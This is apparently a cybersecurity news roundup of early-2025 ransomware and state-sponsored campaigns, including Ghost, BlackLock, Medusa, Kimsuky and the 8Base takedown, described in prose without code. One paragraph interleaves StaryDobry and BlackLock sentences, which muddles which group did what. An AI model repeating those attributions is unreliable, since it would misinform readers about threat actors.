CISA, FBI, and MS-ISAC issued a joint cybersecurity advisory warning organizations about Ghost (Cring) ransomware, a sophisticated cyber threat that has been compromising critical infrastructure, businesses, and government entities worldwide. CISA also added one new vulnerability to its Known Exploited Vulnerabilities Catalog. The advisory, part of the #StopRansomware campaign, outlines the attack methods, technical details, and mitigation strategies needed to defend against this persistent ransomware strain
Lee Enterprises, a major newspaper publisher, confirmed a ransomware attack affecting 77 newspapers and 350 weekly publications, encrypting critical applications and exfiltrating certain files. The StaryDobry campaign used trojanized game installers to deploy the XMRig cryptominer. BlackLock ransomware is emerging as a major player, and uses custom-built malware targeting Windows, VMware ESXi, and Linux environments. The campaign has also been observed deploying the XMRig cryptominer to unsuspecting users, particularly in Russia, Brazil, Germany, Belarus, and Kazakhstan. The attackers are using double-extortion tactics.
The NailaoLocker ransomware is targeting European healthcare organizations. This ransomware uses VPN flaws and is deployed via ShadowPad and PlugX backdoors. The attackers, linked to China-nexus groups, have evolved their malware.
The Medusa ransomware group has claimed responsibility for a cyberattack on UK healthcare giant HCRG Care Group. The attackers are demanding $2 million in ransom for the stolen data, totaling 2.3 TB. The incident is under investigation, and HCRG is working to assess the extent of the breach and its impact on operations. This attack highlights the increasing targeting of healthcare organizations by ransomware groups, threatening the confidentiality and integrity of sensitive patient data.
Medusa ransomware has been known for targeting healthcare organizations and demanding huge ransoms. This is a direct threat to privacy of patients and its expected that a full scale security review will be undertaken to find out the root causes of this breach.
The BlackLock ransomware group is poised to become one of the most prolific RaaS operators in 2025. The group cropped up in early 2024 and is known for their unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and their aggressive recruiting of traffers, initial access brokers, and affiliates. Its ransomware uses custom-built ransomware that can evade analysis. The group employs significant techniques to prevent analysis.
Recent cybersecurity analyses reveal that ransomware gangs are accelerating their operations, with the average time-to-ransom (TTR) now standing at just 17 hours, a significant shift from previous tactics. The attackers are adopting advanced evasion techniques and data extortion strategies, making detection more challenging. This acceleration leaves less time for organizations to detect and respond to incidents.
Espionage tools typically associated with China-linked threat actors were detected in a November 2024 RA World ransomware attack against an Asian software and services firm. Attackers first focused on cyberespionage in an attack against a Southeastern European country’s foreign ministry in July and compromised the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.
The North Korea-linked APT group Kimsuky, also known as Emerald Sleet, is using a new tactic to compromise its traditional espionage targets. The group is tricking targets into running PowerShell as an administrator and executing malicious code. They build rapport with targets before sending a spear-phishing email with an attached PDF. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet. If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool. This allows the threat actor to access the device and carry out data exfiltration.
The Sarcoma ransomware group has claimed responsibility for a breach at Unimicron, a Taiwanese printed circuit board (PCB) manufacturer. The attackers claim to have stolen 377 GB of data, including SQL files, and are threatening to release it if a ransom is not paid. The company confirmed a ransomware intrusion at its China-based subsidiary but has not yet confirmed the data breach.
Kimsuky, a North Korean state-sponsored hacking group, conducted a targeted attack campaign (“DEEP#DRIVE”) against South Korean entities in the business, government, and cryptocurrency sectors. The campaign involved spear-phishing emails with malicious PDF documents and PowerShell code execution. This highlights the persistent threat from state-sponsored actors targeting specific sectors.
International law enforcement agencies have seized the dark web leak site of the 8Base ransomware gang. The takedown is a significant success in disrupting ransomware operations and potentially preventing future attacks. This operation highlights the importance of international collaboration in combating cybercrime. This event is important as it demonstrates a direct action to combat cyber crime and ransomware in particular.
Ransomware payments significantly decreased in 2024, falling 35% to ~$813.55 million, as more victims refused to pay. Despite a higher number of victims being posted on ransomware gang leak sites, fewer organizations yielded to extortion demands. This shift indicates a growing resistance to paying ransoms, potentially driven by improved data recovery strategies and law enforcement efforts.
The report underscores the evolving landscape of ransomware attacks, with a focus on victim empowerment through refusal to pay. It also suggests that while the number of attacks may remain high, the financial success of ransomware operations is diminishing, signaling a potential change in attacker tactics.